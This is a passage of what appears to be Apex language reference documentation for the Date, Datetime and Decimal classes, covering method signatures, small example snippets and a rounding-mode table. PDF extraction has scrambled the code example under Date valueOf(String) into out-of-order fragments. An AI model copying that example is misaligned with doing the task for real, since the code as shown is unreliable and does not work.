Returns the number of days in the month for the specified year and month (1=Jan).
Signature
public static Integer daysInMonth(Integer year, Integer month)
Parameters
year
Type: Integer
month
Type: Integer
Return Value
Type: Integer
Example
The following example finds the number of days in the month of February in the year 1960.
Integer numberDays = date.daysInMonth(1960, 2);
format()
Returns the Date as a string using the locale of the context user
Signature
public String format()
Return Value
Type: String
Example
// In American-English locale
date myDate = date.newInstance(2001, 3, 21);
String dayString = myDate.format();
system.assertEquals('3/21/2001', dayString);
isLeapYear(Integer)
Returns true if the specified year is a leap year.
Signature
public static Boolean isLeapYear(Integer year)
1419
Reference
Date Class
Parameters
year
Type: Integer
Return Value
Type: Boolean
Example
system.assert(Date.isLeapYear(2004));
isSameDay(Date)
Returns true if the Date that called the method is the same as the specified date.
Signature
public Boolean isSameDay(Date compDate)
Parameters
compDate
Type: Date
Return Value
Type: Boolean
Example
date myDate = date.today();
date dueDate = date.newInstance(2008, 1, 30);
boolean dueNow = myDate.isSameDay(dueDate);
month()
Returns the month component of a Date (1=Jan).
Signature
public Integer month()
Return Value
Type: Integer
1420
Reference
Date Class
Example
date myDate = date.newInstance(2004, 11, 21);
Integer month = myDate.month();
system.assertEquals(11, month);
monthsBetween(Date)
Returns the number of months between the Date that called the method and the specified date, ignoring the difference in dates.
Signature
public Integer monthsBetween(Date compDate)
Parameters
compDate
Type: Date
Return Value
Type: Integer
Example
date firstDate = date.newInstance(2006, 12, 2);
date secondDate = date.newInstance(2012, 12, 8);
Integer monthsBetween = firstDate.monthsBetween(secondDate);
system.assertEquals(72, monthsBetween);
Signature
public static Date newInstance(Integer year, Integer month, Integer date)
Parameters
year
Type: Integer
month
Type: Integer
date
Type: Integer
Return Value
Type: Date
1421
Reference
Date Class
Example
The following example creates the date February 17th, 1960:
Date myDate = date.newinstance(1960, 2, 17);
parse(String)
Constructs a Date from a String. The format of the String depends on the local date format.
Signature
public static Date parse(String Date)
Parameters
Date
Type: String
Return Value
Type: Date
Example
The following example works in some locales.
date mydate = date.parse('12/27/2009');
today()
Returns the current date in the current user's time zone.
Signature
public static Date today()
Return Value
Type: Date
toStartOfMonth()
Returns the first of the month for the Date that called the method.
Signature
public Date toStartOfMonth()
Return Value
Type: Date
1422
Reference
Date Class
Example
date myDate = date.newInstance(1987, 12, 17);
date firstDate = myDate.toStartOfMonth();
date expectedDate = date.newInstance(1987, 12, 1);
system.assertEquals(expectedDate, firstDate);
toStartOfWeek()
Returns the start of the week for the Date that called the method, depending on the context user's locale.
Signature
public Date toStartOfWeek()
Return Value
Type: Date
Example
For example, the start of a week is Sunday in the United States locale, and Monday in European locales. For example:
Date myDate = Date.today();
Date weekStart = myDate.toStartofWeek();
valueOf(String)
Returns a Date that contains the value of the specified String.
Signature
public static Date valueOf(String toDate)
Parameters
toDate
Type: String
Return Value
Type: Date
Usage
The specified string should use the standard date format yyyy-MM-dd HH:mm:ss in the local time zone.
Example
string year = '2008';
string month = '10';
1423
Reference
Date Class
string
string
string
string
string
+ '-'
minute
day = '5';
hour = '12';
minute = '20';
second = '20';
stringDate = year + '-' + month
+ day + ' ' + hour + ':' +
+ ':' + second;
valueOf(Object)
Converts the specified history tracking field value to a Date.
Signature
public static Date valueOf(Object fieldValue)
Parameters
fieldValue
Type: Object
Return Value
Type: Date
Usage
Use this method with the OldValue or NewValue fields of history sObjects, such as AccountHistory, when the field is a Date
field.
Example
List<AccountHistory> ahlist = [SELECT Field,OldValue,NewValue FROM AccountHistory];
for(AccountHistory ah : ahlist) {
System.debug('Field: ' + ah.Field);
if (ah.field == 'MyDate__c') {
Date oldValue = Date.valueOf(ah.OldValue);
Date newValue = Date.valueOf(ah.NewValue);
}
}
year()
Returns the year component of a Date
Signature
public Integer year()
1424
Reference
Datetime Class
Return Value
Type: Integer
Example
date myDate = date.newInstance(1988, 12, 17);
system.assertEquals(1988, myDate.year());
Datetime Class
Contains methods for the Datetime primitive data type.
Namespace
System
Usage
For more information about the Datetime, see Primitive Data Types on page 26.
Datetime Methods
The following are methods for Datetime.
IN THIS SECTION:
addDays(Integer)
Adds the specified number of days to a Datetime.
addHours(Integer)
Adds the specified number of hours to a Datetime.
addMinutes(Integer)
Adds the specified number of minutes to a Datetime.
addMonths(Integer)
Adds the specified number of months to a Datetime.
addSeconds(Integer)
Adds the specified number of seconds to a Datetime.
addYears(Integer)
Adds the specified number of years to a Datetime.
date()
Returns the Date component of a Datetime in the local time zone of the context user.
dateGMT()
Return the Date component of a Datetime in the GMT time zone.
day()
Returns the day-of-month component of a Datetime in the local time zone of the context user.
1425
Reference
Datetime Class
dayGmt()
Returns the day-of-month component of a Datetime in the GMT time zone.
dayOfYear()
Returns the day-of-year component of a Datetime in the local time zone of the context user.
dayOfYearGmt()
Returns the day-of-year component of a Datetime in the GMT time zone.
format()
Converts the date to the local time zone and returns the converted date as a formatted string using the locale of the context user.
If the time zone cannot be determined, GMT is used.
format(String)
Converts the date to the local time zone and returns the converted date as a string using the supplied Java simple date format. If
the time zone cannot be determined, GMT is used.
format(String, String)
Converts the date to the specified time zone and returns the converted date as a string using the supplied Java simple date format.
If the supplied time zone is not in the correct format, GMT is used.
formatGmt(String)
Returns a Datetime as a string using the supplied Java simple date format and the GMT time zone.
formatLong()
Converts the date to the local time zone and returns the converted date in long date format.
getTime()
Returns the number of milliseconds since January 1, 1970, 00:00:00 GMT represented by this DateTime object.
hour()
Returns the hour component of a Datetime in the local time zone of the context user.
hourGmt()
Returns the hour component of a Datetime in the GMT time zone.
isSameDay(Datetime)
Returns true if the Datetime that called the method is the same as the specified Datetime in the local time zone of the context user.
millisecond()
Return the millisecond component of a Datetime in the local time zone of the context user.
millisecondGmt()
Return the millisecond component of a Datetime in the GMT time zone.
minute()
Returns the minute component of a Datetime in the local time zone of the context user.
minuteGmt()
Returns the minute component of a Datetime in the GMT time zone.
month()
Returns the month component of a Datetime in the local time zone of the context user (1=Jan).
monthGmt()
Returns the month component of a Datetime in the GMT time zone (1=Jan).
newInstance(Long)
Constructs a Datetime and initializes it to represent the specified number of milliseconds since January 1, 1970, 00:00:00 GMT.
1426
Reference
Datetime Class
newInstance(Date, Time)
Constructs a DateTime from the specified date and time in the local time zone.
newInstance(Integer, Integer, Integer)
Constructs a Datetime from Integer representations of the specified year, month (1=Jan), and day at midnight in the local time zone.
newInstance(Integer, Integer, Integer, Integer, Integer, Integer)
Constructs a Datetime from Integer representations of the specified year, month (1=Jan), day, hour, minute, and second in the local
time zone.
newInstanceGmt(Date, Time)
Constructs a DateTime from the specified date and time in the GMT time zone.
newInstanceGmt(Integer, Integer, Integer)
Constructs a Datetime from Integer representations of the specified year, month (1=Jan), and day at midnight in the GMT time zone
newInstanceGmt(Integer, Integer, Integer, Integer, Integer, Integer)
Constructs a Datetime from Integer representations of the specified year, month (1=Jan), day, hour, minute, and second in the GMT
time zone
now()
Returns the current Datetime based on a GMT calendar.
parse(String)
Constructs a Datetime from the String datetime in the local time zone and in the format of the user locale.
second()
Returns the second component of a Datetime in the local time zone of the context user.
secondGmt()
Returns the second component of a Datetime in the GMT time zone.
time()
Returns the time component of a Datetime in the local time zone of the context user.
timeGmt()
Returns the time component of a Datetime in the GMT time zone.
valueOf(String)
Returns a Datetime that contains the value of the specified string.
valueOf(Object)
Converts the specified history tracking field value to a Datetime.
valueOfGmt(String)
Returns a Datetime that contains the value of the specified String.
year()
Returns the year component of a Datetime in the local time zone of the context user.
yearGmt()
Returns the year component of a Datetime in the GMT time zone.
addDays(Integer)
Adds the specified number of days to a Datetime.
1427
Reference
Datetime Class
Signature
public Datetime addDays(Integer addlDays)
Parameters
addlDays
Type: Integer
Return Value
Type: Datetime
Example
Datetime myDateTime = Datetime.newInstance(1960, 2, 17);
Datetime newDateTime = myDateTime.addDays(2);
Datetime expected = Datetime.newInstance(1960, 2, 19);
System.assertEquals(expected, newDateTime);
addHours(Integer)
Adds the specified number of hours to a Datetime.
Signature
public Datetime addHours(Integer addlHours)
Parameters
addlHours
Type: Integer
Return Value
Type: Datetime
Example
DateTime myDateTime = DateTime.newInstance(1997, 1, 31, 7, 8, 16);
DateTime newDateTime = myDateTime.addHours(3);
DateTime expected = DateTime.newInstance(1997, 1, 31, 10, 8, 16);
System.assertEquals(expected, newDateTime);
addMinutes(Integer)
Adds the specified number of minutes to a Datetime.
Signature
public Datetime addMinutes(Integer addlMinutes)
1428
Reference
Datetime Class
Parameters
addlMinutes
Type: Integer
Return Value
Type: Datetime
Example
DateTime myDateTime = DateTime.newInstance(1999, 2, 11, 8, 6, 16);
DateTime newDateTime = myDateTime.addMinutes(7);
DateTime expected = DateTime.newInstance(1999, 2, 11, 8, 13, 16);
System.assertEquals(expected, newDateTime);
addMonths(Integer)
Adds the specified number of months to a Datetime.
Signature
public Datetime addMonths(Integer addlMonths)
Parameters
addlMonths
Type: Integer
Return Value
Type: Datetime
Example
DateTime myDateTime = DateTime.newInstance(2000, 7, 7, 7, 8, 12);
DateTime newDateTime = myDateTime.addMonths(1);
DateTime expected = DateTime.newInstance(2000, 8, 7, 7, 8, 12);
System.assertEquals(expected, newDateTime);
addSeconds(Integer)
Adds the specified number of seconds to a Datetime.
Signature
public Datetime addSeconds(Integer addlSeconds)
1429
Reference
Datetime Class
Parameters
addlSeconds
Type: Integer
Return Value
Type: Datetime
Example
DateTime myDateTime = DateTime.newInstance(2001, 7, 19, 10, 7, 12);
DateTime newDateTime = myDateTime.addSeconds(4);
DateTime expected = DateTime.newInstance(2001, 7, 19, 10, 7, 16);
System.assertEquals(expected, newDateTime);
addYears(Integer)
Adds the specified number of years to a Datetime.
Signature
public Datetime addYears(Integer addlYears)
Parameters
addlYears
Type: Integer
Return Value
Type: Datetime
Example
DateTime myDateTime = DateTime.newInstance(2009, 12, 17, 13, 6, 6);
DateTime newDateTime = myDateTime.addYears(1);
DateTime expected = DateTime.newInstance(2010, 12, 17, 13, 6, 6);
System.assertEquals(expected, newDateTime);
date()
Returns the Date component of a Datetime in the local time zone of the context user.
Signature
public Date date()
Return Value
Type: Date
1430
Reference
Datetime Class
Example
DateTime myDateTime = DateTime.newInstance(2006, 3, 16, 12, 6, 13);
Date myDate = myDateTime.date();
Date expected = Date.newInstance(2006, 3, 16);
System.assertEquals(expected, myDate);
dateGMT()
Return the Date component of a Datetime in the GMT time zone.
Signature
public Date dateGMT()
Return Value
Type: Date
Example
// California local time, PST
DateTime myDateTime = DateTime.newInstance(2006, 3, 16, 23, 0, 0);
Date myDate = myDateTime.dateGMT();
Date expected = Date.newInstance(2006, 3, 17);
System.assertEquals(expected, myDate);
day()
Returns the day-of-month component of a Datetime in the local time zone of the context user.
Signature
public Integer day()
Return Value
Type: Integer
Example
DateTime myDateTime = DateTime.newInstance(1986, 2, 21, 23, 0, 0);
System.assertEquals(21, myDateTime.day());
dayGmt()
Returns the day-of-month component of a Datetime in the GMT time zone.
Signature
public Integer dayGmt()
1431
Reference
Datetime Class
Return Value
Type: Integer
Example
// California local time, PST
DateTime myDateTime = DateTime.newInstance(1987, 1, 14, 23, 0, 3);
System.assertEquals(15, myDateTime.dayGMT());
dayOfYear()
Returns the day-of-year component of a Datetime in the local time zone of the context user.
Signature
public Integer dayOfYear()
Return Value
Type: Integer
Example
For example, February 5, 2008 08:30:12 would be day 36.
Datetime myDate = Datetime.newInstance(2008, 2, 5, 8, 30, 12);
system.assertEquals(myDate.dayOfYear(), 36);
dayOfYearGmt()
Returns the day-of-year component of a Datetime in the GMT time zone.
Signature
public Integer dayOfYearGmt()
Return Value
Type: Integer
Example
// This sample assumes we are in the PST timezone
DateTime myDateTime = DateTime.newInstance(1999, 2, 5, 23, 0, 3);
// January has 31 days + 5 days in February = 36 days
// dayOfYearGmt() adjusts the time zone from the current time zone to GMT
// by adding 8 hours to the PST time zone, so it's 37 days and not 36 days
System.assertEquals(37, myDateTime.dayOfYearGmt());
1432
Reference
Datetime Class
format()
Converts the date to the local time zone and returns the converted date as a formatted string using the locale of the context user. If the
time zone cannot be determined, GMT is used.
Signature
public String format()
Return Value
Type: String
Example
DateTime myDateTime = DateTime.newInstance(1993, 6, 6, 3, 3, 3);
system.assertEquals('6/6/1993 3:03 AM', mydatetime.format());
format(String)
Converts the date to the local time zone and returns the converted date as a string using the supplied Java simple date format. If the
time zone cannot be determined, GMT is used.
Signature
public String format(String dateFormat)
Parameters
dateFormat
Type: String
Return Value
Type: String
Usage
For more information on the Java simple date format, see Java SimpleDateFormat.
Example
Datetime myDT = Datetime.now();
String myDate = myDT.format('h:mm a');
format(String, String)
Converts the date to the specified time zone and returns the converted date as a string using the supplied Java simple date format. If
the supplied time zone is not in the correct format, GMT is used.
1433
Reference
Datetime Class
Signature
public String format(String dateFormat, String timezone)
Parameters
dateFormat
Type: String
timezone
Type: String
Valid time zone values for the timezone argument are the time zones of the Java TimeZone class that correspond to the time
zones returned by the TimeZone.getAvailableIDs method in Java. We recommend you use full time zone names, not the three-letter
abbreviations.
Return Value
Type: String
Usage
For more information on the Java simple date format, see Java SimpleDateFormat.
Example
This example uses format to convert a GMT date to the America/New_York time zone and formats the date using the specified date
format.
Datetime GMTDate =
Datetime.newInstanceGmt(2011,6,1,12,1,5);
String strConvertedDate =
GMTDate.format('MM/dd/yyyy HH:mm:ss',
'America/New_York');
// Date is converted to
// the new time zone and is adjusted
// for daylight saving time.
System.assertEquals(
'06/01/2011 08:01:05', strConvertedDate);
formatGmt(String)
Returns a Datetime as a string using the supplied Java simple date format and the GMT time zone.
Signature
public String formatGmt(String dateFormat)
Parameters
dateFormat
Type: String
1434
Reference
Datetime Class
Return Value
Type: String
Usage
For more information on the Java simple date format, see Java SimpleDateFormat.
Example
DateTime myDateTime = DateTime.newInstance(1993, 6, 6, 3, 3, 3);
String formatted = myDateTime.formatGMT('EEE, MMM d yyyy HH:mm:ss');
String expected = 'Sun, Jun 6 1993 10:03:03';
System.assertEquals(expected, formatted);
formatLong()
Converts the date to the local time zone and returns the converted date in long date format.
Signature
public String formatLong()
Return Value
Type: String
Example
// Passing local date based on the PST time zone
Datetime dt = DateTime.newInstance(2012,12,28,10,0,0);
// Writes 12/28/2012 10:00:00 AM PST
System.debug('dt.formatLong()=' + dt.formatLong());
getTime()
Returns the number of milliseconds since January 1, 1970, 00:00:00 GMT represented by this DateTime object.
Signature
public Long getTime()
Return Value
Type: Long
Example
DateTime dt = DateTime.newInstance(2007, 6, 23, 3, 3, 3);
Long gettime = dt.getTime();
1435
Reference
Datetime Class
hour()
Returns the hour component of a Datetime in the local time zone of the context user.
Signature
public Integer hour()
Return Value
Type: Integer
Example
DateTime myDateTime = DateTime.newInstance(1998, 11, 21, 3, 3, 3);
System.assertEquals(3 , myDateTime.hour());
hourGmt()
Returns the hour component of a Datetime in the GMT time zone.
Signature
public Integer hourGmt()
Return Value
Type: Integer
Example
// California local time
DateTime myDateTime = DateTime.newInstance(2000, 4, 27, 3, 3, 3);
System.assertEquals(10 , myDateTime.hourGMT());
isSameDay(Datetime)
Returns true if the Datetime that called the method is the same as the specified Datetime in the local time zone of the context user.
Signature
public Boolean isSameDay(Datetime compDt)
Parameters
compDt
Type: Datetime
1436
Reference
Datetime Class
Return Value
Type: Boolean
Example
datetime myDate = datetime.now();
datetime dueDate =
datetime.newInstance(2008, 1, 30);
boolean dueNow = myDate.isSameDay(dueDate);
millisecond()
Return the millisecond component of a Datetime in the local time zone of the context user.
Signature
public Integer millisecond()
Return Value
Type: Integer
Example
DateTime myDateTime = DateTime.now();
system.debug(myDateTime.millisecond());
millisecondGmt()
Return the millisecond component of a Datetime in the GMT time zone.
Signature
public Integer millisecondGmt()
Return Value
Type: Integer
Example
DateTime myDateTime = DateTime.now();
system.debug(myDateTime.millisecondGMT());
minute()
Returns the minute component of a Datetime in the local time zone of the context user.
1437
Reference
Datetime Class
Signature
public Integer minute()
Return Value
Type: Integer
Example
DateTime myDateTime = DateTime.newInstance(2001, 2, 27, 3, 3, 3);
system.assertEquals(3, myDateTime.minute());
minuteGmt()
Returns the minute component of a Datetime in the GMT time zone.
Signature
public Integer minuteGmt()
Return Value
Type: Integer
Example
DateTime myDateTime = DateTime.newInstance(2002, 12, 3, 3, 3, 3);
system.assertEquals(3, myDateTime.minuteGMT());
month()
Returns the month component of a Datetime in the local time zone of the context user (1=Jan).
Signature
public Integer month()
Return Value
Type: Integer
Example
DateTime myDateTime = DateTime.newInstance(2004, 11, 4, 3, 3, 3);
system.assertEquals(11, myDateTime.month());
monthGmt()
Returns the month component of a Datetime in the GMT time zone (1=Jan).
1438
Reference
Datetime Class
Signature
public Integer monthGmt()
Return Value
Type: Integer
Example
DateTime myDateTime = DateTime.newInstance(2006, 11, 19, 3, 3, 3);
system.assertEquals(11, myDateTime.monthGMT());
newInstance(Long)
Constructs a Datetime and initializes it to represent the specified number of milliseconds since January 1, 1970, 00:00:00 GMT.
Signature
public static Datetime newInstance(Long milliseconds)
Parameters
milliseconds
Type: Long
Return Value
Type: Datetime
The returned date is in the GMT time zone.
Example
Long longtime = 1341828183000L;
DateTime dt = DateTime.newInstance(longtime);
DateTime expected = DateTime.newInstance(2012, 7, 09, 3, 3, 3);
System.assertEquals(expected, dt);
newInstance(Date, Time)
Constructs a DateTime from the specified date and time in the local time zone.
Signature
public static Datetime newInstance(Date dt, Time tm)
Parameters
dt
Type: Date
1439
Reference
Datetime Class
tm
Type: Time
Return Value
Type: Datetime
The returned date is in the GMT time zone.
Example
Date myDate = Date.newInstance(2011, 11, 18);
Time myTime = Time.newInstance(3, 3, 3, 0);
DateTime dt = DateTime.newInstance(myDate, myTime);
DateTime expected = DateTime.newInstance(2011, 11, 18, 3, 3, 3);
System.assertEquals(expected, dt);
Signature
public static Datetime newInstance(Integer year, Integer month, Integer day)
Parameters
year
Type: Integer
month
Type: Integer
day
Type: Integer
Return Value
Type: Datetime
The returned date is in the GMT time zone.
Example
datetime myDate = datetime.newInstance(2008, 12, 1);
1440
Reference
Datetime Class
Signature
public static Datetime newInstance(Integer year, Integer month, Integer day, Integer
hour, Integer minute, Integer second)
Parameters
year
Type: Integer
month
Type: Integer
day
Type: Integer
hour
Type: Integer
minute
Type: Integer
second
Type: Integer
Return Value
Type: Datetime
The returned date is in the GMT time zone.
Example
Datetime myDate = Datetime.newInstance(2008, 12, 1, 12, 30, 2);
newInstanceGmt(Date, Time)
Constructs a DateTime from the specified date and time in the GMT time zone.
Signature
public static Datetime newInstanceGmt(Date dt, Time tm)
Parameters
dt
Type: Date
tm
Type: Time
Return Value
Type: Datetime
1441
Reference
Datetime Class
Example
Date myDate = Date.newInstance(2013, 11, 12);
Time myTime = Time.newInstance(3, 3, 3, 0);
DateTime dt = DateTime.newInstanceGMT(myDate, myTime);
DateTime expected = DateTime.newInstanceGMT(2013, 11, 12, 3, 3, 3);
System.assertEquals(expected, dt);
Signature
public static Datetime newInstanceGmt(Integer year, Integer month, Integer date)
Parameters
year
Type: Integer
month
Type: Integer
date
Type: Integer
Return Value
Type: Datetime
Example
DateTime dt = DateTime.newInstanceGMT(1996, 3, 22);
Signature
public static Datetime newInstanceGmt(Integer year, Integer month, Integer date, Integer
hour, Integer minute, Integer second)
Parameters
year
Type: Integer
month
Type: Integer
1442
Reference
Datetime Class
date
Type: Integer
hour
Type: Integer
minute
Type: Integer
second
Type: Integer
Return Value
Type: Datetime
Example
//California local time
DateTime dt = DateTime.newInstanceGMT(1998, 1, 29, 2, 2, 3);
DateTime expected = DateTime.newInstance(1998, 1, 28, 18, 2, 3);
System.assertEquals(expected, dt);
now()
Returns the current Datetime based on a GMT calendar.
Signature
public static Datetime now()
Return Value
Type: Datetime
The format of the returned datetime is: 'MM/DD/YYYY HH:MM PERIOD'
Example
datetime myDateTime = datetime.now();
parse(String)
Constructs a Datetime from the String datetime in the local time zone and in the format of the user locale.
Signature
public static Datetime parse(String datetime)
1443
Reference
Datetime Class
Parameters
datetime
Type: String
Return Value
Type: Datetime
The returned date is in the GMT time zone.
Example
This example uses parse to create a Datetime from a date passed in as a string and that is formatted for the English (United States)
locale. You may need to change the format of the date string if you have a different locale.
Datetime dt = DateTime.parse('10/14/2011 11:46 AM');
String myDtString = dt.format();
system.assertEquals(myDtString, '10/14/2011 11:46 AM');
second()
Returns the second component of a Datetime in the local time zone of the context user.
Signature
public Integer second()
Return Value
Type: Integer
Example
DateTime dt = DateTime.newInstanceGMT(1999, 9, 22, 3, 1, 2);
System.assertEquals(2, dt.second());
secondGmt()
Returns the second component of a Datetime in the GMT time zone.
Signature
public Integer secondGmt()
Return Value
Type: Integer
1444
Reference
Datetime Class
Example
DateTime dt = DateTime.newInstance(2000, 2, 3, 3, 1, 5);
System.assertEquals(5, dt.secondGMT());
time()
Returns the time component of a Datetime in the local time zone of the context user.
Signature
public Time time()
Return Value
Type: Time
Example
DateTime dt = DateTime.newInstance(2002, 11, 21, 0, 2, 2);
Time expected = Time.newInstance(0, 2, 2, 0);
System.assertEquals(expected, dt.time());
timeGmt()
Returns the time component of a Datetime in the GMT time zone.
Signature
public Time timeGmt()
Return Value
Type: Time
Example
// This sample is based on the PST time zone
DateTime dt = DateTime.newInstance(2004, 1, 27, 4, 1, 2);
Time expected = Time.newInstance(12, 1, 2, 0);
// 8 hours are added to the time to convert it from
// PST to GMT
System.assertEquals(expected, dt.timeGMT());
valueOf(String)
Returns a Datetime that contains the value of the specified string.
Signature
public static Datetime valueOf(String toDateTime)
1445
Reference
Datetime Class
Parameters
toDateTime
Type: String
Return Value
Type: Datetime
The returned date is in the GMT time zone.
Usage
The specified string should use the standard date format yyyy-MM-dd HH:mm:ss in the local time zone.
Example
string year = '2008';
string month = '10';
string day = '5';
string hour = '12';
string minute = '20';
string second = '20';
string stringDate = year + '-' + month + '-' + day + ' ' + hour + ':'
+ minute + ':' + second;
Datetime myDate = Datetime.valueOf(stringDate);
valueOf(Object)
Converts the specified history tracking field value to a Datetime.
Signature
public static Datetime valueOf(Object fieldValue)
Parameters
fieldValue
Type: Object
Return Value
Type: Datetime
Usage
Use this method with the OldValue or NewValue fields of history sObjects, such as AccountHistory, when the field is a
Date/Time field.
1446
Reference
Datetime Class
Example
List<AccountHistory> ahlist = [SELECT Field,OldValue,NewValue FROM AccountHistory];
for(AccountHistory ah : ahlist) {
System.debug('Field: ' + ah.Field);
if (ah.field == 'MyDatetime__c') {
Datetime oldValue = Datetime.valueOf(ah.OldValue);
Datetime newValue = Datetime.valueOf(ah.NewValue);
}
}
valueOfGmt(String)
Returns a Datetime that contains the value of the specified String.
Signature
public static Datetime valueOfGmt(String toDateTime)
Parameters
toDateTime
Type: String
Return Value
Type: Datetime
Usage
The specified string should use the standard date format yyyy-MM-dd HH:mm:ss in the GMT time zone.
Example
// California locale time
string year = '2009';
string month = '3';
string day = '5';
string hour = '5';
string minute = '2';
string second = '2';
string stringDate = year + '-' + month + '-' + day + ' ' + hour + ':'
+ minute + ':' + second;
Datetime myDate = Datetime.valueOfGMT(stringDate);
DateTime expected = DateTime.newInstance(2009, 3, 4, 21, 2, 2);
System.assertEquals(expected, myDate);
year()
Returns the year component of a Datetime in the local time zone of the context user.
1447
Reference
Decimal Class
Signature
public Integer year()
Return Value
Type: Integer
Example
DateTime dt = DateTime.newInstance(2012, 1, 26, 5, 2, 4);
System.assertEquals(2012, dt.year());
yearGmt()
Returns the year component of a Datetime in the GMT time zone.
Signature
public Integer yearGmt()
Return Value
Type: Integer
Example
DateTime dt = DateTime.newInstance(2012, 10, 4, 6, 4, 6);
System.assertEquals(2012, dt.yearGMT());
Decimal Class
Contains methods for the Decimal primitive data type.
Namespace
System
Usage
For more information on Decimal, see Primitive Data Types on page 26.
IN THIS SECTION:
Rounding Mode
Rounding mode specifies the rounding behavior for numerical operations capable of discarding precision.
Decimal Methods
1448
Reference
Decimal Class
Rounding Mode
Rounding mode specifies the rounding behavior for numerical operations capable of discarding precision.
Each rounding mode indicates how the least significant returned digit of a rounded result is to be calculated. The following are the valid
values for roundingMode.
Name
Description
CEILING
Rounds towards positive infinity. That is, if the result is positive, this mode behaves the same as
the UP rounding mode; if the result is negative, it behaves the same as the DOWN rounding
mode. Note that this rounding mode never decreases the calculated value. For example:
Input number 5.5: CEILING round mode result: 6
Input number 1.1: CEILING round mode result: 2
Input number -1.1: CEILING round mode result: -1
Input number -2.7: CEILING round mode result: -2
Decimal[] example = new Decimal[]{5.5, 1.1, -1.1, -2.7};
Long[] expected = new Long[]{6, 2, -1, -2};
for(integer x = 0; x < example.size(); x++){
System.assertEquals(expected[x],
example[x].round(System.RoundingMode.CEILING));
}
DOWN
Rounds towards zero. This rounding mode always discards any fractions (decimal points) prior
to executing. Note that this rounding mode never increases the magnitude of the calculated
value. For example:
Input number 5.5: DOWN round mode result: 5
Input number 1.1: DOWN round mode result: 1
Input number -1.1: DOWN round mode result: -1
Input number -2.7: DOWN round mode result: -2
Decimal[] example = new Decimal[]{5.5, 1.1, -1.1, -2.7};
Long[] expected = new Long[]{5, 1, -1, -2};
for(integer x = 0; x < example.size(); x++){
System.assertEquals(expected[x],
example[x].round(System.RoundingMode.DOWN));
}
FLOOR
Rounds towards negative infinity. That is, if the result is positive, this mode behaves the same as
theDOWN rounding mode; if negative, this mode behaves the same as the UP rounding mode.
Note that this rounding mode never increases the calculated value. For example:
Input number 5.5: FLOOR round mode result: 5
Input number 1.1: FLOOR round mode result: 1
Input number -1.1: FLOOR round mode result: -2
Input number -2.7: FLOOR round mode result: -3
Decimal[] example = new Decimal[]{5.5, 1.1, -1.1, -2.7};
Long[] expected = new Long[]{5, 1, -2, -3};
1449
Reference
Name
Decimal Class
Description
for(integer x = 0; x < example.size(); x++){
System.assertEquals(expected[x],
example[x].round(System.RoundingMode.FLOOR));
}
HALF_DOWN
Rounds towards the nearest neighbor unless both neighbors are equidistant, in which case
this mode rounds down. This rounding mode behaves the same as the UP rounding mode if
the discarded fraction (decimal point) is > 0.5; otherwise, it behaves the same as DOWN rounding
mode. For example:
Input number 5.5: HALF_DOWN round mode result: 5
Input number 1.1: HALF_DOWN round mode result: 1
Input number -1.1: HALF_DOWN round mode result: -1
Input number -2.7: HALF_DOWN round mode result: -3
Decimal[] example = new Decimal[]{5.5, 1.1, -1.1, -2.7};
Long[] expected = new Long[]{5, 1, -1, -3};
for(integer x = 0; x < example.size(); x++){
System.assertEquals(expected[x],
example[x].round(System.RoundingMode.HALF_DOWN));
}
HALF_EVEN
Rounds towards the nearest neighbor unless both neighbors are equidistant, in which case,
this mode rounds towards the even neighbor. This rounding mode behaves the same as the
HALF_UP rounding mode if the digit to the left of the discarded fraction (decimal point) is
odd. It behaves the same as the HALF_DOWN rounding method if it is even. For example:
Input number 5.5: HALF_EVEN round mode result: 6
Input number 1.1: HALF_EVEN round mode result: 1
Input number -1.1: HALF_EVEN round mode result: -1
Input number -2.7: HALF_EVEN round mode result: -3
Decimal[] example = new Decimal[]{5.5, 1.1, -1.1, -2.7};
Long[] expected = new Long[]{6, 1, -1, -3};
for(integer x = 0; x < example.size(); x++){
System.assertEquals(expected[x],
example[x].round(System.RoundingMode.HALF_EVEN));
}
Note that this rounding mode statistically minimizes cumulative error when applied repeatedly
over a sequence of calculations.
HALF_UP
Rounds towards the nearest neighbor unless both neighbors are equidistant, in which case,
this mode rounds up. This rounding method behaves the same as the UP rounding method if
the discarded fraction (decimal point) is >= 0.5; otherwise, this rounding method behaves the
same as the DOWN rounding method. For example:
Input number 5.5: HALF_UP round mode result: 6
Input number 1.1: HALF_UP round mode result: 1
Input number -1.1: HALF_UP round mode result: -1
1450
Reference
Name
Decimal Class
Description
Input number -2.7: HALF_UP round mode result: -3
Decimal[] example = new Decimal[]{5.5, 1.1, -1.1, -2.7};
Long[] expected = new Long[]{6, 1, -1, -3};
for(integer x = 0; x < example.size(); x++){
System.assertEquals(expected[x],
example[x].round(System.RoundingMode.HALF_UP));
}
UNNECESSARY
Asserts that the requested operation has an exact result, which means that no rounding is
necessary. If this rounding mode is specified on an operation that yields an inexact result, a
MathException is thrown. For example:
Input number 5.5: UNNECESSARY round mode result: MathException
Input number 1.1: UNNECESSARY round mode result: MathException
Input number 1.0: UNNECESSARY round mode result: 1
Input number -1.0: UNNECESSARY round mode result: -1
Input number -2.2: UNNECESSARY round mode result: MathException
Decimal example1 = 5.5;
Decimal example2 = 1.0;
system.assertEquals(1,
example2.round(System.RoundingMode.UNNECESSARY));
try{
example1.round(System.RoundingMode.UNNECESSARY);
} catch(Exception E) {
system.assertEquals('System.MathException', E.getTypeName());
}
UP
Rounds away from zero. This rounding mode always truncates any fractions (decimal points)
prior to executing. Note that this rounding mode never decreases the magnitude of the calculated
value. For example:
Input number 5.5: UP round mode result: 6
Input number 1.1: UP round mode result: 2
Input number -1.1: UP round mode result: -2
Input number -2.7: UP round mode result: -3
Decimal[] example = new Decimal[]{5.5, 1.1, -1.1, -2.7};
Long[] expected = new Long[]{6, 2, -2, -3};
for(integer x = 0; x < example.size(); x++){
System.assertEquals(expected[x],
example[x].round(System.RoundingMode.UP));
}
Decimal Methods
The following are methods for Decimal.
1451
Reference
Decimal Class
IN THIS SECTION:
abs()
Returns the absolute value of the Decimal.
divide(Decimal, Integer)
Divides this Decimal by the specified divisor, and sets the scale, that is, the number of decimal places, of the result using the specified
scale.
divide(Decimal, Integer, Object)
Divides this Decimal by the specified divisor, sets the scale, that is, the number of decimal places, of the result using the specified
scale, and if necessary, rounds the value using the rounding mode.
doubleValue()
Returns the Double value of this Decimal.
format()
Returns the String value of this Decimal using the locale of the context user.
intValue()
Returns the Integer value of this Decimal.
longValue()
Returns the Long value of this Decimal.
pow(Integer)
Returns the value of this decimal raised to the power of the specified exponent.
precision()
Returns the total number of digits for the Decimal.
round()
Returns the rounded approximation of this Decimal. The number is rounded to zero decimal places using half-even rounding mode,
